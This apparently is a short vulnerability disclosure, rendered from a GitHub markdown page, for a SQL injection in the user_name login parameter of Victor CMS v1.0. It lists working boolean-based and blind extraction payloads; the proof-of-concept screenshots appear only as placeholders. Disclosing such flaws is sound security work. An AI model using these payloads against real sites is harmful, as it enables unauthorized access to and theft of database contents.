Skip to content

Latest commit

 

History

History
22 lines (15 loc) · 1.13 KB

VictorCMS SQL.md

File metadata and controls

22 lines (15 loc) · 1.13 KB
  • VULNERABLE: SQL injection vulnerability exists in VictorCMS . An attacker can inject query in “/CMSsite/includes/login.php" via the "user_name" parameters.
  • Product: Victor CMS v1.0
  • Impact: Allow attacker inject query and access , disclosure of all data on the system.
  • Payload Boolean true: test' or '1'='1
  • Payload Boolean false: test' or '1'='2
  • Payload exploit example: test' or (ascii(substr((select(database())),1,1))<127)--+-
  • Proof of concept (POC):

image

  • You see Whether the user name is correct or not, the response status of the returned package is different
  • Payload Boolean true: user_name=test'+or+'1'='1

image

  • Payload Boolean false: user_name=test'+or+'1'='2

image

  • Exploit:

image